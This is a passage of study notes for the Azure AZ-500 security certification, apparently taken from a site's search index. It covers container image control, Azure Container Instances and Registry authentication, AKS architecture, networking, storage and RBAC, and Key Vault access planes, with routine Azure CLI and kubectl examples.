Ensure that only approved images are used in your environment: There's enough change and volatility in a container ecosystem without allowing unknown containers as well. Allow only approved container images. Have tools and processes in place to monitor for and prevent the use of unapproved container images. An effective way of reducing the attack surface and preventing developers from making critical security mistakes is to control the flow of container images into your development environment. Image signing or fingerprinting can provide a chain of custody that enables you to verify the integrity of the containers. For example, Azure Container Registry supports Docker's content trust model, which allows image publishers to sign images that are pushed to a registry, and image consumers to pull only signed images.

                            Enforce least privileges in runtime: The concept of least privileges is a basic security best practice that also applies to containers. When a vulnerability is exploited, it generally gives the attacker access and privileges equal to those of the compromised application or process. Ensuring that containers operate with the lowest privileges and access required to get the job done reduces your exposure to risk.

Reduce the container attack surface by removing unneeded privileges: You can also minimize the potential attack surface by removing any unused or unnecessary processes or privileges from the container runtime. Privileged containers run as root. If a malicious user or workload escapes from a privileged container, the container will then be running as root on that system.

                            Log all container administrative user access for auditing: Maintain an accurate audit trail of administrative access to your container ecosystem, including your Kubernetes cluster, container registry, and container images. These logs might be necessary for auditing purposes and will be useful as forensic evidence after any security incident. Azure solutions include:

                            • Integration of Azure Kubernetes Service with Microsoft Defender for Cloud to monitor the security configuration of the cluster environment and generate security recommendations
                            • Azure Container Monitoring solution
                            • Resource logs for Azure Container Instances and Azure Container Registry

                            Container access

• Azure Container Instances enables exposing your container groups directly to the internet with an IP address and a fully qualified domain name (FQDN). When you create a container instance, you can specify a custom DNS name label so your application is reachable at customlabel.azureregion.azurecontainer.io.
• Azure Container Instances also supports executing a command in a running container by providing an interactive shell to help with application development and troubleshooting. Access takes place over HTTPS, using TLS to secure client connections. Both capabilities are shown in the sketch below.
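A sketch of both capabilities with placeholder names, using the public aci-helloworld sample image:

```bash
# Container group with a custom DNS name label, reachable on port 80
az container create \
  --resource-group MyResourceGroup \
  --name mycontainer \
  --image mcr.microsoft.com/azuredocs/aci-helloworld \
  --dns-name-label mycustomlabel \
  --ports 80

# Interactive shell in the running container (access is secured with TLS)
az container exec \
  --resource-group MyResourceGroup \
  --name mycontainer \
  --exec-command "/bin/sh"
```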

                            Container deployment: Deploy containers from DockerHub or Azure Container Registry.

Hypervisor-level security: Historically, containers have offered application dependency isolation and resource governance but have not been considered sufficiently hardened for hostile multi-tenant usage. Azure Container Instances guarantees your application is as isolated in a container as it would be in a VM.

Custom sizes: Containers are typically optimized to run just a single application, but the exact needs of those applications can differ greatly. Azure Container Instances provides optimum utilization by allowing exact specifications of CPU cores and memory. You pay based on what you need and get billed by the second, so you can fine-tune your spending based on actual need.

                            Persistent storage: To retrieve and persist state with Azure Container Instances, we offer direct mounting of Azure Files shares backed by Azure Storage.

                            Flexible billing: Supports per-GB, per-CPU, and per-second billing.

Linux and Windows containers: Azure Container Instances can schedule both Windows and Linux containers with the same API. Simply specify the OS type when you create your container groups. For Windows container deployments, use images based on common Windows base images. Some features are currently restricted to Linux containers:

                            • Multiple containers per container group
                            • Volume mounting (Azure Files, emptyDir, GitRepo, secret)
                            • Resource usage metrics with Azure Monitor
                            • Virtual network deployment
                            • GPU resources (preview)

                            Co-scheduled groups: Azure Container Instances supports scheduling of multi-container groups that share a host machine, local network, storage, and lifecycle. This enables you to combine your main application container with other supporting role containers, such as logging sidecars.

Virtual network deployment: Currently available for production workloads in a subset of Azure regions, this feature of Azure Container Instances enables deployment of container instances into an Azure virtual network. By deploying container instances into a subnet within your virtual network, they can communicate securely with other resources in the virtual network, including those that are on premises (through VPN gateway or ExpressRoute).

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#43-azure-container-registry-acr","title":"4.3. Azure Container Registry (ACR)","text":"

                            A container registry is a service that stores and distributes container images. Docker Hub is a public container registry that supports the open source community and serves as a general catalog of images. Azure Container Registry provides users with direct control of their images, with integrated authentication, geo-replication supporting global distribution and reliability for network-close deployments, virtual network and firewall configuration, tag locking, and many other enhanced features.

                            In addition to Docker container images, Azure Container Registry supports related content artifacts including Open Container Initiative (OCI) image formats.

                            You log in to a registry using the Azure CLI or the standard docker login command. Azure Container Registry transfers container images over HTTPS, and supports TLS to secure client connections. Azure Container Registry requires all secure connections from servers and applications to use TLS 1.2. Enable TLS 1.2 by using any recent docker client (version 18.03.0 or later). You control access to a container registry using an Azure identity, a Microsoft Entra ID-backed service principal, or a provided admin account. Use role-based access control (RBAC) to assign users or systems fine-grained permissions to a registry.

Container registries manage repositories, collections of container images or other artifacts with the same name but different tags. For example, the following three images are in the "acr-helloworld" repository (a listing sketch follows this list):

                            • acr-helloworld:latest
                            • acr-helloworld:v1
                            • acr-helloworld:v2
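Repositories and their tags can be listed with the Azure CLI (the registry name is a placeholder):

```bash
az acr repository list --name myprivateregistry -o table
az acr repository show-tags --name myprivateregistry --repository acr-helloworld -o table
```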

                            A container image or other artifact within a registry is associated with one or more tags, has one or more layers, and is identified by a manifest. Understanding how these components relate to each other can help you manage your registry effectively.

                            As with any IT environment, you should consistently monitor activity and user access to your container ecosystem to quickly identify any suspicious or malicious activity. The container monitoring solution in Log Analytics can help you view and manage your Docker and Windows container hosts in a single location.

                            By using Log Analytics, you can:

                            • View detailed audit information that shows commands used with containers.
                            • Troubleshoot containers by viewing and searching centralized logs without having to remotely view Docker or Windows hosts.
                            • Find containers that may be noisy and consuming excess resources on a host.
                            • View centralized CPU, memory, storage, and network usage and performance information for containers.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#44-azure-container-registry-authentication","title":"4.4. Azure Container Registry authentication","text":"

Individual login with Microsoft Entra ID. - When working with your registry directly, such as pulling images to and pushing images from a development workstation, authenticate by using the az acr login command in the Azure CLI. When you log in with az acr login, the CLI uses the token created when you executed az login to seamlessly authenticate your session with your registry. To complete the authentication flow, Docker must be installed and running in your environment. az acr login uses the Docker client to set a Microsoft Entra token in the docker.config file. Once you've logged in this way, your credentials are cached, and subsequent docker commands in your session do not require a username or password.
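The flow, as a short sketch ("myregistry" is a placeholder):

```bash
az login                         # obtains the Microsoft Entra token
az acr login --name myregistry   # sets a registry token via the Docker client
docker pull myregistry.azurecr.io/acr-helloworld:v1   # no further credential prompt
```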

Service Principal. - If you assign a service principal to your registry, your application or service can use it for headless authentication. Service principals allow role-based access to a registry, and you can assign multiple service principals to a registry. Multiple service principals allow you to define different access for different applications. The available roles for a container registry include:

                            • AcrPull: pull
                            • AcrPush: pull and push
                            • Owner: pull, push, and assign roles to other users

Admin account. - Each container registry includes an admin user account, which is disabled by default. You can enable the admin user and manage its credentials in the Azure portal, or by using the Azure CLI or other Azure tools. The admin account is provided with two passwords, both of which can be regenerated. Two passwords allow you to maintain connection to the registry by using one password while you regenerate the other. If the admin account is enabled, you can pass the username and either password to the docker login command when prompted for basic authentication to the registry.
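A hedged sketch of both options with placeholder names: a service principal scoped to the registry with the AcrPull role, then enabling the admin account and reading its two regenerable passwords.

```bash
ACR_ID=$(az acr show --name myregistry --query id -o tsv)

# Headless authentication: service principal with pull-only access
az ad sp create-for-rbac \
  --name myregistry-pull-sp \
  --scopes "$ACR_ID" \
  --role acrpull

# Admin account: disabled by default; enable it and read its credentials
az acr update --name myregistry --admin-enabled true
az acr credential show --name myregistry
```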

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#45-azure-kubernetes-service-aks","title":"4.5. Azure Kubernetes Service (AKS)","text":"

As application development moves towards a container-based approach, the need to orchestrate and manage resources grows. Kubernetes is the leading platform for reliable scheduling of fault-tolerant application workloads. Azure Kubernetes Service (AKS) is a managed Kubernetes offering that further simplifies container-based application deployment and management.

                            Azure Kubernetes Service (AKS) provides a managed Kubernetes service that reduces the complexity for deployment and core management tasks, including coordinating upgrades. The AKS control plane is managed by the Azure platform, and you only pay for the AKS nodes that run your applications. AKS is built on top of the open-source Azure Kubernetes Service Engine (aks-engine).

                            Kubernetes cluster architecture: A Kubernetes cluster is divided into two components:

• Control plane nodes provide the core Kubernetes services and orchestration of application workloads.
• Nodes run your application workloads.

Features of Azure Kubernetes Service (a short creation sketch follows this list):

                            • Fully managed
                            • Public IP and FQDN (Private IP option)
                            • Accessed with RBAC or Microsoft Entra ID
                            • Deployment of containers
                            • Dynamic scale containers
                            • Automation of rolling updates and rollbacks of containers
                            • Management of storage, network traffic, and sensitive information
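A minimal creation sketch (names are placeholders):

```bash
az aks create \
  --resource-group MyResourceGroup \
  --name MyAKSCluster \
  --node-count 2 \
  --enable-managed-identity

# Merge the cluster credentials into ~/.kube/config and test access
az aks get-credentials --resource-group MyResourceGroup --name MyAKSCluster
kubectl get nodes   # lists only worker nodes; the control plane is managed by Azure
```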

                            Kubernetes cluster architecture is a set of design recommendations for deploying your containers in a secure and managed configuration. When you create an AKS cluster, a cluster master is automatically created and configured. This cluster master is provided as a managed Azure resource abstracted from the user. There is no cost for the cluster master, only the nodes that are part of the AKS cluster. The cluster master includes the following core Kubernetes components:

• kube-apiserver - The API server is how the underlying Kubernetes APIs are exposed. This component provides the interaction for management tools, such as kubectl or the Kubernetes dashboard. By default, the Kubernetes API server uses a public IP address and a fully qualified domain name (FQDN). You can control access to the API server using Kubernetes role-based access controls and Microsoft Entra ID.
• etcd - To maintain the state of your Kubernetes cluster and configuration, the highly available etcd is a key-value store within Kubernetes.
• kube-scheduler - When you create or scale applications, the Scheduler determines what nodes can run the workload and starts them.
• kube-controller-manager - The Controller Manager oversees a number of smaller controllers that perform actions such as replicating pods and handling node operations.

AKS provides a single-tenant cluster master, with a dedicated API server, Scheduler, etc. You define the number and size of the nodes, and the Azure platform configures the secure communication between the cluster master and nodes. Interaction with the cluster master occurs through Kubernetes APIs, such as kubectl or the Kubernetes dashboard.

                            This managed cluster master means that you do not need to configure components like a highly available store, but it also means that you cannot access the cluster master directly. Upgrades to Kubernetes are orchestrated through the Azure CLI or Azure portal, which upgrades the cluster master and then the nodes. To troubleshoot possible issues, you can review the cluster master logs through Azure Log Analytics.

If you need to configure the cluster master in a particular way or need direct access to it, you can deploy your own Kubernetes cluster using aks-engine.

Nodes and node pools: To run your applications and supporting services, you need a Kubernetes node. An AKS cluster has one or more nodes; each node is an Azure virtual machine (VM) that runs the Kubernetes node components and container runtime:

• The kubelet is the Kubernetes agent that processes orchestration requests from the control plane and schedules running the requested containers.
• Virtual networking is handled by the kube-proxy on each node. The proxy routes network traffic and manages IP addressing for services and pods.
• The container runtime is the component that allows containerized applications to run and interact with additional resources such as the virtual network and storage. In AKS, Moby is used as the container runtime.

                            The Azure VM size for your nodes defines how many CPUs, how much memory, and the size and type of storage available (such as high-performance SSD or regular HDD). If you anticipate a need for applications that require large amounts of CPU and memory or high-performance storage, plan the node size accordingly. You can also scale out the number of nodes in your AKS cluster to meet demand.

                            In AKS, the VM image for the nodes in your cluster is currently based on Ubuntu Linux or Windows Server 2019. When you create an AKS cluster or scale out the number of nodes, the Azure platform creates the requested number of VMs and configures them. There's no manual configuration for you to perform. Agent nodes are billed as standard virtual machines, so any discounts you have on the VM size you're using (including Azure reservations) are automatically applied. If you need to use a different host OS, container runtime, or include custom packages, you can deploy your own Kubernetes cluster using aks-engine. The upstream aks-engine releases features and provides configuration options before they are officially supported in AKS clusters. For example, if you wish to use a container runtime other than Moby, you can use aks-engine to configure and deploy a Kubernetes cluster that meets your current needs.
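Sizing and scaling sketch under placeholder names (the default pool name nodepool1 and the GPU VM size are assumptions, not course values):

```bash
# Add a pool of identically configured nodes sized for a specific workload
az aks nodepool add \
  --resource-group MyResourceGroup \
  --cluster-name MyAKSCluster \
  --name gpupool \
  --node-count 1 \
  --node-vm-size Standard_NC6s_v3

# Scale an existing pool out to meet demand
az aks scale \
  --resource-group MyResourceGroup \
  --name MyAKSCluster \
  --nodepool-name nodepool1 \
  --node-count 3
```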

                            Some basic concepts

                            • Pools: Group of nodes with identical configuration.
                            • Node: Individual VM running containerized applications.
                            • Pods: Single instance of an application. A pod can contain multiple containers.
                            • Deployment: One or more identical pods managed by Kubernetes.
                            • Manifest: YAML file describing a deployment.

                            AKS nodes are Azure virtual machines that you manage and maintain. Linux nodes run an optimized Ubuntu distribution using the Moby container runtime. Windows Server nodes run an optimized Windows Server 2019 release and also use the Moby container runtime. When an AKS cluster is created or scaled up, the nodes are automatically deployed with the latest OS security updates and configurations.

                            • Linux: The Azure platform automatically applies OS security patches to Linux nodes on a nightly basis. If a Linux OS security update requires a host reboot, that reboot is not automatically performed. You can manually reboot the Linux nodes, or a common approach is to use Kured, an open-source reboot daemon for Kubernetes. Kured runs as a DaemonSet and monitors each node for the presence of a file indicating that a reboot is required. Reboots are managed across the cluster using the same cordon and drain process as a cluster upgrade.
• Windows: Windows Update does not automatically run and apply the latest updates. On a regular schedule around the Windows Update release cycle and your own validation process, you should perform an upgrade on the Windows Server node pool(s) in your AKS cluster. This upgrade process creates nodes that run the latest Windows Server image and patches, then removes the older nodes.

Nodes are deployed into a private virtual network subnet, with no public IP addresses assigned. For troubleshooting and management purposes, SSH is enabled by default. This SSH access is only available using the internal IP address.

                            To provide storage, the nodes use Azure Managed Disks. For most VM node sizes, these are Premium disks backed by high-performance SSDs. The data stored on managed disks is automatically encrypted at rest within the Azure platform. To improve redundancy, these disks are also securely replicated within the Azure datacenter.

                            Kubernetes environments, in AKS or elsewhere, currently aren't completely safe for hostile multi-tenant usage. Additional security features such as Pod Security Policies or more fine-grained role-based access controls (RBAC) for nodes make exploits more difficult. However, for true security when running hostile multi-tenant workloads, a hypervisor is the only level of security that you should trust. The security domain for Kubernetes becomes the entire cluster, not an individual node. For these types of hostile multi-tenant workloads, you should use physically isolated clusters.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#46-azure-kubernetes-service-networking","title":"4.6. Azure Kubernetes Service networking","text":"

                            To allow access to your applications, or for application components to communicate with each other, Kubernetes provides an abstraction layer to virtual networking. Kubernetes nodes are connected to a virtual network, and can provide inbound and outbound connectivity for pods. The kube-proxy component runs on each node to provide these network features.

                            In Kubernetes, Services logically group pods to allow for direct access via an IP address or DNS name and on a specific port. You can also distribute traffic using a load balancer. More complex routing of application traffic can also be achieved with Ingress Controllers. Security and filtering of the network traffic for pods is possible with Kubernetes network policies.

The Azure platform also helps to simplify virtual networking for AKS clusters. When you create a Kubernetes load balancer, the underlying Azure load balancer resource is created and configured. As you open network ports to pods, the corresponding Azure network security group rules are configured. For HTTP application routing, Azure can also configure external DNS as new ingress routes are configured. To sum up (a kubectl sketch follows this list):

• Cluster IP - Creates an internal IP address for use within the AKS cluster. Good for internal-only applications that support other workloads within the cluster.
• NodePort - Creates a port mapping on the underlying node that allows the application to be accessed directly with the node IP address and port.
• LoadBalancer - Creates an Azure load balancer resource, configures an external IP address, and connects the requested pods to the load balancer backend pool. To allow customers' traffic to reach the application, load balancing rules are created on the desired ports.
• ExternalName - Creates a specific DNS entry for easier application access.
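
As an illustration of the LoadBalancer type, here is a minimal sketch of a Service manifest; the names, labels, and ports are hypothetical:

```
# Minimal sketch: expose pods labeled "app: my-app" through an Azure load balancer.
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Service
metadata:
  name: my-app
spec:
  type: LoadBalancer    # AKS provisions an Azure load balancer and a public IP
  selector:
    app: my-app         # pods selected by this label receive the traffic
  ports:
  - port: 80            # port exposed on the load balancer
    targetPort: 8080    # container port the traffic is forwarded to
EOF
```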

The Network Policy feature in Kubernetes lets you define rules for ingress and egress traffic between pods in a cluster.
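
A minimal sketch of such a network policy, assuming hypothetical app: frontend and app: backend pod labels and a cluster created with network policy support enabled:

```
# Minimal sketch: only pods labeled "app: frontend" may reach "app: backend" pods on TCP 8080.
kubectl apply -f - <<'EOF'
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: backend-allow-frontend
spec:
  podSelector:
    matchLabels:
      app: backend      # the policy applies to these pods
  policyTypes:
  - Ingress
  ingress:
  - from:
    - podSelector:
        matchLabels:
          app: frontend # only pods with this label may connect
    ports:
    - protocol: TCP
      port: 8080
EOF
```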

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#47-azure-kubernetes-service-storage","title":"4.7. Azure Kubernetes Service storage","text":"

                            Applications that run in Azure Kubernetes Service (AKS) may need to store and retrieve data.

                            A volume represents a way to store, retrieve, and persist data across pods and through the application lifecycle. Traditional volumes to store and retrieve data are created as Kubernetes resources backed by Azure Storage. You can manually create these data volumes to be assigned to pods directly, or have Kubernetes automatically create them. These data volumes can use Azure Disks or Azure Files:

• Azure Disks can be used to create a Kubernetes DataDisk resource. Disks can use Azure Premium storage, backed by high-performance SSDs, or Azure Standard storage, backed by regular HDDs. For most production and development workloads, use Premium storage. Azure Disks are mounted as ReadWriteOnce, so are only available to a single pod. For storage volumes that can be accessed by multiple pods simultaneously, use Azure Files.
• Azure Files can be used to mount an SMB 3.0 share backed by an Azure Storage account to pods. Files let you share data across multiple nodes and pods. Files can use Azure Standard storage backed by regular HDDs, or Azure Premium storage, backed by high-performance SSDs.

                            Volumes that are defined and created as part of the pod lifecycle only exist until the pod is deleted. Pods often expect their storage to remain if a pod is rescheduled on a different host during a maintenance event, especially in StatefulSets. A persistent volume (PV) is a storage resource created and managed by the Kubernetes API that can exist beyond the lifetime of an individual pod.

A Persistent Volume can be statically created by a cluster administrator, or dynamically created by the Kubernetes API server. If a pod is scheduled and requests storage that is not currently available, Kubernetes can create the underlying Azure Disk or Files storage and attach it to the pod. Dynamic provisioning uses a StorageClass to identify what type of Azure storage needs to be created.

                            To define different tiers of storage, such as Premium and Standard, you can create a Storage Class. The StorageClass also defines the reclaimPolicy. This reclaimPolicy controls the behavior of the underlying Azure storage resource when the pod is deleted and the persistent volume may no longer be required. The underlying storage resource can be deleted, or retained for use with a future pod. In AKS, two initial StorageClasses are created:

• default - Uses Azure Standard storage to create a Managed Disk. The reclaim policy indicates that the underlying Azure Disk is deleted when the persistent volume that used it is deleted.
• managed-premium - Uses Azure Premium storage to create a Managed Disk. The reclaim policy again indicates that the underlying Azure Disk is deleted when the persistent volume that used it is deleted.

                            If no StorageClass is specified for a persistent volume, the default StorageClass is used.
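
A minimal sketch of a custom StorageClass with a Retain reclaim policy; it assumes the in-tree kubernetes.io/azure-disk provisioner that the initial AKS classes were historically built on (recent clusters use the Azure Disk CSI driver instead), and the class name is hypothetical:

```
# Minimal sketch: Premium managed disks whose underlying Azure Disk is kept
# when the persistent volume is deleted.
kubectl apply -f - <<'EOF'
apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
  name: managed-premium-retain      # hypothetical name
provisioner: kubernetes.io/azure-disk
parameters:
  storageaccounttype: Premium_LRS   # Premium SSD-backed managed disk
  kind: Managed
reclaimPolicy: Retain               # keep the Azure Disk after the PV is deleted
EOF
```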

                            A PersistentVolumeClaim requests either Disk or File storage of a particular StorageClass, access mode, and size. The Kubernetes API server can dynamically provision the underlying storage resource in Azure if there is no existing resource to fulfill the claim based on the defined StorageClass. The pod definition includes the volume mount once the volume has been connected to the pod. A PersistentVolume is bound to a PersistentVolumeClaim once an available storage resource has been assigned to the pod requesting it. There is a 1:1 mapping of persistent volumes to claims.
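
A minimal sketch of a PersistentVolumeClaim that dynamically provisions a Premium managed disk through the built-in managed-premium class; the claim name and size are hypothetical:

```
# Minimal sketch: request a 5 GiB Premium managed disk via dynamic provisioning.
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: azure-managed-disk          # hypothetical name
spec:
  accessModes:
  - ReadWriteOnce                   # Azure Disks attach to a single pod at a time
  storageClassName: managed-premium
  resources:
    requests:
      storage: 5Gi
EOF
```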

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#48-secure-authentication-to-azure-kubernetes-service-with-active-directory","title":"4.8. Secure authentication to Azure Kubernetes Service with Active Directory","text":"

There are basically two mechanisms to secure authentication to Azure Kubernetes Service:

• Kubernetes service accounts: One of the primary user types in Kubernetes is a service account. A service account exists in, and is managed by, the Kubernetes API. The credentials for service accounts are stored as Kubernetes secrets, which allows them to be used by authorized pods to communicate with the API Server. Most API requests provide an authentication token for a service account or a normal user account. Normal user accounts allow more traditional access for human administrators or developers, not just services and processes. Kubernetes itself doesn't provide an identity management solution where regular user accounts and passwords are stored. Instead, external identity solutions can be integrated into Kubernetes. For AKS clusters, this integrated identity solution is Microsoft Entra ID.
• Microsoft Entra integration: The security of AKS clusters can be enhanced with the integration of Microsoft Entra ID. With Microsoft Entra ID, you can integrate on-premises identities into AKS clusters to provide a single source for account management and security. With Microsoft Entra integrated AKS clusters, you can grant users or groups access to Kubernetes resources within a namespace or across the cluster. To obtain a kubectl configuration context, a user can run the az aks get-credentials command. When a user then interacts with the AKS cluster with kubectl, they are prompted to sign in with their Microsoft Entra credentials. This approach provides a single source for user account management and password credentials. The user can only access the resources as defined by the cluster administrator (see the sketch after this list).
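
A minimal sketch of that flow; the resource group and cluster names are hypothetical:

```
# Minimal sketch: pull the kubeconfig context for an AKS cluster.
az aks get-credentials --resource-group rg-demo --name aks-demo-001

# On a Microsoft Entra integrated cluster, the first kubectl call prompts
# for an interactive Microsoft Entra sign-in.
kubectl get nodes
```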

                            Microsoft Entra authentication in AKS clusters uses OpenID Connect, an identity layer built on top of the OAuth 2.0 protocol. OAuth 2.0 defines mechanisms to obtain and use access tokens to access protected resources, and OpenID Connect implements authentication as an extension to the OAuth 2.0 authorization process.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#49-access-to-azure-kubernetes-service-using-azure-role-based-access-controls","title":"4.9. Access to Azure Kubernetes Service using Azure role-based access controls","text":"

Azure role-based access control (RBAC) is an authorization system built on Azure Resource Manager that provides fine-grained access management of Azure resources.

| RBAC system | Description |
| --- | --- |
| Kubernetes RBAC | Designed to work on Kubernetes resources within your AKS cluster. |
| Azure RBAC | Designed to work on resources within your Azure subscription. |

                            There are two levels of access needed to fully operate an AKS cluster:

                            • Access the AKS resource in your Azure subscription.
                              • Control scaling or upgrading your cluster using the AKS APIs.
  • Pull your kubeconfig.
                            • Access to the Kubernetes API. This access is controlled by either:
  • Kubernetes RBAC (traditionally).
                              • Integrating Azure RBAC with AKS for Kubernetes authorization.

                            Before you assign permissions to users with Kubernetes RBAC, you first define those permissions as a Role. Kubernetes roles grant permissions. There is no concept of a deny permission.

                            Roles are used to grant permissions within a namespace. If you need to grant permissions across the entire cluster, or to cluster resources outside a given namespace, you can instead use ClusterRoles.

                            A ClusterRole works in the same way to grant permissions to resources, but can be applied to resources across the entire cluster, not a specific namespace.

                            Once roles are defined to grant permissions to resources, you assign those Kubernetes RBAC permissions with a RoleBinding. If your AKS cluster integrates with Microsoft Entra ID, bindings are how those Microsoft Entra users are granted permissions to perform actions within the cluster.

                            A ClusterRoleBinding works in the same way to bind roles to users, but can be applied to resources across the entire cluster, not a specific namespace. This approach lets you grant administrators or support engineers access to all resources in the AKS cluster.
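
A minimal sketch of a namespaced Role plus a RoleBinding; the namespace, names, and the Microsoft Entra UPN are hypothetical:

```
# Minimal sketch: allow one user to read pods in the "dev" namespace only.
kubectl apply -f - <<'EOF'
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: pod-reader
  namespace: dev
rules:
- apiGroups: [""]                  # "" is the core API group
  resources: ["pods"]
  verbs: ["get", "list", "watch"]  # grants only; Kubernetes RBAC has no deny rules
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: read-pods
  namespace: dev
subjects:
- kind: User
  name: user@contoso.com           # hypothetical Microsoft Entra UPN
  apiGroup: rbac.authorization.k8s.io
roleRef:
  kind: Role
  name: pod-reader
  apiGroup: rbac.authorization.k8s.io
EOF
```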

Secrets at Linux: A Kubernetes Secret is used to inject sensitive data into pods, such as access credentials or keys. You first create a Secret using the Kubernetes API. When you define your pod or deployment, a specific Secret can be requested. Secrets are only provided to nodes that have a scheduled pod that requires them, and the Secret is stored in tmpfs, not written to disk. When the last pod on a node that requires a Secret is deleted, the Secret is deleted from the node's tmpfs. Secrets are stored within a given namespace and can only be accessed by pods within the same namespace. The use of Secrets reduces the sensitive information that is defined in the pod or service YAML manifest. Instead, you request the Secret stored in the Kubernetes API Server as part of your YAML manifest. This approach only provides the specific pod access to the Secret. Please note: the raw secret manifest file contains the secret data in base64 format. Therefore, this file should be treated as sensitive information, and never committed to source control.
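
A minimal sketch of creating such a Secret; the name and value are hypothetical, and note that base64 is an encoding, not encryption:

```
# Minimal sketch: base64-encode a value, then store it as a Secret.
echo -n 'S3cretPassw0rd' | base64   # -> UzNjcmV0UGFzc3cwcmQ=

kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Secret
metadata:
  name: db-creds                    # hypothetical name
type: Opaque
data:
  password: UzNjcmV0UGFzc3cwcmQ=    # base64 of the value above; treat this file as sensitive
EOF
```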

Secrets in Windows containers: Secrets are written in clear text on the node's volume (as compared to tmpfs/in-memory on Linux). This means customers have to do two things:

                            • Use file ACLs to secure the secrets file location
                            • Use volume-level encryption using BitLocker
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/","title":"III. Data and applications","text":"Sources of this notes
                            • The Microsoft e-learn platform.
                            • Book: \"Microsoft Certified - MCA Microsoft Certified Associate Azure Security Engineer Study Guide: Exam AZ-500.
                            • Udemy course: AZ-500 Microsoft Azure Security Technologies Exam Prep.
                            • Udemy course: Azure Security: AZ-500 (updated July 2023)
                            Summary: AZ-500 Microsoft Azure Security Engineer Certification
                            • About the certificate
                            • I. Manage Identity and Access
                            • II. Platform protection
                            • III. Data and applications
                            • IV. Security operations
                            • AZ-500 and more: keep learning

                            Cheatsheets: Azure-CLI | Azure PowerShell

                            100 questions you should pass for the AZ-500 certificate

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#1-azure-key-vault","title":"1. Azure Key Vault","text":"

                            Azure Key Vault helps safeguard cryptographic keys and secrets that cloud applications and services use. Key Vault streamlines the key management process and enables you to maintain control of keys that access and encrypt your data. Developers can create keys for development and testing in minutes, and then migrate them to production keys. Security administrators can grant (and revoke) permission to keys, as needed. You can use Key Vault to create multiple secure containers, called vaults. Vaults help reduce the chances of accidental loss of security information by centralizing application secrets storage. Key vaults also control and log the access to anything stored in them.

                            Azure Key Vault helps address the following issues:

                            • Secrets management. You can use Azure Key Vault to securely store and tightly control access to tokens, passwords, certificates, API keys, and other secrets.
                            • Key management. You use Azure Key Vault as a key management solution, making it easier to create and control the encryption keys used to encrypt your data.
                            • Certificate management. Azure Key Vault is also a service that lets you easily provision, manage, and deploy public and private SSL/TLS certificates for use with Azure and your internal connected resources.
• Store secrets backed by hardware security modules (HSMs). The secrets and keys can be protected either by software or by FIPS 140-2 Level 2 validated HSMs.

                            Key Vault is not intended as storage for user passwords.
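
A minimal sketch of creating a vault and storing a first secret; all names are hypothetical (vault names must be globally unique):

```
# Minimal sketch: create a vault, store a secret, read it back.
az keyvault create --name kv-demo-001 --resource-group rg-demo --location westeurope

az keyvault secret set  --vault-name kv-demo-001 --name DbPassword --value 'S3cretPassw0rd'
az keyvault secret show --vault-name kv-demo-001 --name DbPassword --query value -o tsv
```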

                            Access to a key vault is controlled through two separate interfaces: management plane, and data plane. The management plane and data plane access controls work independently. Use RBAC to control what users have access to. For example, if you want to grant an application access to use keys in a key vault, you only need to grant data plane access permissions by using key vault access policies, and no management plane access is needed for this application. Conversely, if you want a user to be able to read vault properties and tags but not have any access to keys, secrets, or certificates, you can grant this user read access by using RBAC, and no access to the data plane is required.

                            If a user has contributor permissions (RBAC) to a key vault management plane, they can grant themselves access to the data plane by setting a key vault access policy. We recommend that you tightly control who has contributor access to your key vaults, to ensure that only authorized persons can access and manage your key vaults, keys, secrets, and certificates.

                            Azure Resource Manager can securely deploy certificates stored in Azure Key Vault to Azure VMs when the VMs are deployed. By setting appropriate access policies for the key vault, you also control who gets access to your certificate. Another benefit is that you manage all your certificates in one place in Azure Key Vault.

                            Deletion of key vaults or key vault objects can be either inadvertent or malicious. Enable the soft delete and purge protection features of Key Vault, particularly for keys that are used to encrypt data at rest. Deletion of these keys is equivalent to data loss, so you can recover deleted vaults and vault objects if needed. Practice Key Vault recovery operations on a regular basis.

Azure Key Vault is offered in two service tiers: standard and premium. The main difference between standard and premium is that premium supports HSM-protected keys.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#11-configure-key-vault-access","title":"1.1. Configure Key Vault access","text":"

                            Access to a key vault is controlled through two interfaces: the management plane, and the data plane. The management plane is where you manage Key Vault itself. Operations in this plane include creating and deleting key vaults, retrieving Key Vault properties, and updating access policies. The data plane is where you work with the data stored in a key vault. You can add, delete, and modify keys, secrets, and certificates from here.

                            To access a key vault in either plane, all callers (users or applications) must have proper authentication and authorization. Authentication establishes the identity of the caller. Authorization determines which operations the caller can execute.

Both planes use Microsoft Entra ID for authentication. For authorization, the management plane uses RBAC, and the data plane can use either the newly added RBAC or a Key Vault access policy.
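
A minimal sketch of both authorization options for the data plane; the vault name and user are hypothetical, and the Azure RBAC path assumes the vault uses the 'Azure role-based access control' permission model:

```
# Option 1: Azure RBAC on the data plane.
KV_ID=$(az keyvault show --name kv-demo-001 --query id -o tsv)
az role assignment create --role "Key Vault Secrets User" \
  --assignee user@contoso.com --scope "$KV_ID"

# Option 2: classic Key Vault access policy.
az keyvault set-policy --name kv-demo-001 \
  --upn user@contoso.com --secret-permissions get list
```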

When you create a key vault in an Azure subscription, it's automatically associated with the Microsoft Entra tenant of the subscription. Applications can access Key Vault in two ways:

